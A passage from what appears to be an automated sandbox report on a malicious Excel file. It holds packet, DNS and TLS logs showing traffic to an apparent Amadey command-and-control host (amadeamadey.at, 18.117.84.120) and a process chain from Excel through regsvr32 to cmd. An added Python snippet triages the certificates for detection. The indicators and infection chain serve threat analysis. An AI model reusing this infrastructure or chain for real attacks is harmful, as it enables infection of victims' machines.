Jun 9, 2021 15:21:56.339329958 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339350939 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339354992 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339380026 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339387894 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339404106 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339426994 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339430094 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339457035 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339462996 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339482069 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339494944 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339521885 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339530945 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339540958 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339566946 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339582920 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339629889 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.344010115 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.344036102 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.344147921 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.475028992 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475059986 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475073099 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475085974 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475107908 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475147009 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475167990 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475191116 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475208998 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475212097 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.475234032 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475253105 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475265026 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.475342989 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.482059956 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.618499994 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:22:49.096944094 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.236207008 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.236434937 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.246424913 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.385665894 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.386614084 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.386635065 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.386751890 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.393546104 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.533077002 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.577728987 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:54.731709957 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:54.907586098 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:24.941314936 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.080559015 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.220175028 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.220691919 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.222739935 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.362360954 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.363224030 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.363259077 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.364415884 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.368238926 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.508029938 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.510736942 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.687309980 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:56.901083946 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.016983986 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.158025980 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.158145905 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.158910990 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.297934055 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.298791885 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.298819065 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.298913956 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.301543951 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.440867901 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.442948103 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.619473934 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:24:08.904089928 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 9, 2021 15:21:38.244496107 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:38.294626951 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:38.999614000 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:39.059832096 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:39.159909964 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:39.210349083 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:40.534393072 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:40.584779024 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:42.137758970 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:42.198226929 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:43.285564899 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:43.346214056 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:45.533961058 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:45.584702015 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:49.907931089 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:49.958479881 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.077616930 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.183701038 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.218998909 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.277750969 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.637789011 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.717477083 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:52.668123007 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:52.742284060 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:53.718720913 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:53.776930094 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.219571114 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.279922962 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.392092943 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.444571972 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.776357889 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.835069895 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:56.973902941 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:57.028814077 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:57.771101952 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:57.822587013 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:59.385391951 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:59.440799952 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:59.850233078 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:59.908941984 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:05.187127113 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:05.240174055 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:06.356194973 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:06.411145926 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:07.310992002 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:07.364352942 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:08.822825909 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:08.872876883 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:10.216510057 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:10.277961016 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:12.805483103 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:12.879868031 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:33.340646982 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:33.401187897 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:35.480846882 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:35.617012978 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:36.693973064 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:36.752301931 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:37.430131912 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:37.571043968 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:37.991182089 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.050961018 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:38.482630014 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.550734043 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:38.699526072 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.760968924 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:39.343851089 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:39.405417919 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:39.908086061 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:39.969800949 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:40.793365002 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:40.852049112 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:41.757324934 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:41.818587065 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:42.288892984 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:42.350413084 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:50.255160093 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:50.318708897 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:00.317203999 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:00.378262997 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:16.410259008 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:16.469381094 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:34.410224915 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:34.482976913 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:35.993652105 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:36.063276052 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Jun 9, 2021 15:22:05.833841085 CEST | 192.168.2.6 | 8.8.7.7 | 4d5a | | Echo |
Jun 9, 2021 15:22:10.528872013 CEST | 192.168.2.6 | 8.8.7.7 | 4d59 | | Echo |
Jun 9, 2021 15:22:20.469414949 CEST | 192.168.2.6 | 8.8.7.7 | 4d58 | | Echo |
Jun 9, 2021 15:22:25.029455900 CEST | 192.168.2.6 | 8.8.7.7 | 4d57 | | Echo |
Jun 9, 2021 15:22:36.677659035 CEST | 192.168.2.6 | 8.8.7.7 | 4d56 | | Echo |
Jun 9, 2021 15:22:41.530548096 CEST | 192.168.2.6 | 8.8.7.7 | 4d55 | | Echo |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.219571114 CEST | 192.168.2.6 | 8.8.8.8 | 0x9318 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.279922962 CEST | 8.8.8.8 | 192.168.2.6 | 0x9318 | No error (0) | 107.180.50.232 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.561739922 CEST | 107.180.50.232 | 443 | 192.168.2.6 | 49715 | CN=tpfcu.com, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Mar 05 15:44:31 CET 2021 | Wed Apr 06 16:44:31 CEST 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
 | | | | | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | | |
Jun 9, 2021 15:22:49.386614084 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49740 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Jun 9, 2021 15:23:25.363224030 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49747 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Jun 9, 2021 15:23:57.298791885 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49750 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
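The certificate and JA3 columns above can be triaged mechanically. The Python below is an added example and not part of the sandbox report: the two rows are transcribed from the HTTPS Packets table (leaf certificates only; the GoDaddy intermediate row is left out), while the function names, the one-day "freshly issued" threshold and the decision to drop the CET/CEST zone tokens (every time in this report is in the same zone) are this example's own assumptions.

```python
"""Triage of the TLS rows of a sandbox report: self-signed leaf certificates,
certificate age at the moment it was observed, certificate lifetime, and a
recomputation of the JA3 digest (MD5 over the JA3 string).
Added example; row values are transcribed from the report's HTTPS table.
"""
import hashlib
import re
from datetime import datetime, timedelta

# Transcribed from the report's HTTPS Packets table (leaf certificates only).
ROWS = [
    {
        "observed": "Jun 9, 2021 15:21:55.561739922 CEST",
        "server": "107.180.50.232",
        "subject": "CN=tpfcu.com, OU=Domain Control Validated",
        "issuer": 'CN=Go Daddy Secure Certificate Authority - G2, '
                  'OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", '
                  'L=Scottsdale, ST=Arizona, C=US',
        "not_before": "Fri Mar 05 15:44:31 CET 2021",
        "not_after": "Wed Apr 06 16:44:31 CEST 2022",
        "ja3": "771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-"
               "49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0",
        "ja3_digest": "37f463bf4616ecd445d4a1937da06e19",
    },
    {
        "observed": "Jun 9, 2021 15:22:49.386614084 CEST",
        "server": "18.117.84.120",
        "subject": "CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT",
        "issuer": "CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT",
        "not_before": "Wed Jun 09 10:22:21 CEST 2021",
        "not_after": "Thu Jun 09 10:22:21 CEST 2022",
        "ja3": "771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-"
               "49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0",
        "ja3_digest": "8916410db85077a5460817142dcbc8de",
    },
]


def parse_dn(dn):
    """Split an X.500 DN string into {attribute: value}.
    Commas inside double quotes (O="GoDaddy.com, Inc.") do not split."""
    parts, buf, quoted = [], [], False
    for ch in dn:
        if ch == '"':
            quoted = not quoted          # quotes delimit, they are not part of the value
        elif ch == "," and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    out = {}
    for part in parts:
        key, _, value = part.strip().partition("=")   # split on the first '=' only
        out[key] = value
    return out


def parse_cert_time(s):
    """'Wed Jun 09 10:22:21 CEST 2021' -> naive datetime (zone token dropped;
    assumption: all timestamps in the report share one zone)."""
    _weekday, mon, day, clock, _tz, year = s.split()
    return datetime.strptime(f"{mon} {day} {year} {clock}", "%b %d %Y %H:%M:%S")


def parse_observed(s):
    """'Jun 9, 2021 15:22:49.386614084 CEST' -> naive datetime, fraction ignored."""
    mon, day, year, clock = re.match(r"(\w{3}) (\d+), (\d{4}) (\d\d:\d\d:\d\d)", s).groups()
    return datetime.strptime(f"{mon} {day} {year} {clock}", "%b %d %Y %H:%M:%S")


def ja3_digest(ja3):
    """A JA3 digest is the MD5 hex digest of the comma-separated JA3 string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def triage(row, max_age=timedelta(days=1)):
    """Return the handful of fields an analyst looks at first for one TLS row."""
    subj, iss = parse_dn(row["subject"]), parse_dn(row["issuer"])
    not_before, not_after = parse_cert_time(row["not_before"]), parse_cert_time(row["not_after"])
    seen = parse_observed(row["observed"])
    age = seen - not_before
    return {
        "server": row["server"],
        "cn": subj.get("CN"),
        "self_signed": subj == iss,                   # subject DN equals issuer DN
        "ca_org": iss.get("O"),                       # who vouches for the name
        "cert_age": age,                              # how long before the connection it was minted
        "fresh_cert": timedelta(0) <= age < max_age,  # issued within max_age of being seen
        "lifetime_days": (not_after - not_before).days,
        "ja3_recomputed": ja3_digest(row["ja3"]) == row["ja3_digest"],
    }


if __name__ == "__main__":
    for r in ROWS:
        print(triage(r))
```

Run stand-alone it prints one dict per row. The 18.117.84.120 row comes out self-signed, with an issuer organisation that is not a certificate authority and a certificate minted about five hours before the connection; that combination, rather than anything malformed in the TLS layer, is what to alert on. The parse_dn splitter matters because a naive split on commas would break the GoDaddy organisation name in two.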
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 15:21:49 |
Start date: | 09/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x10000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:21:55 |
Start date: | 09/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe50000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:21:56 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:03 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:04 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:04 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 15:22:13 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:17 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:18 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
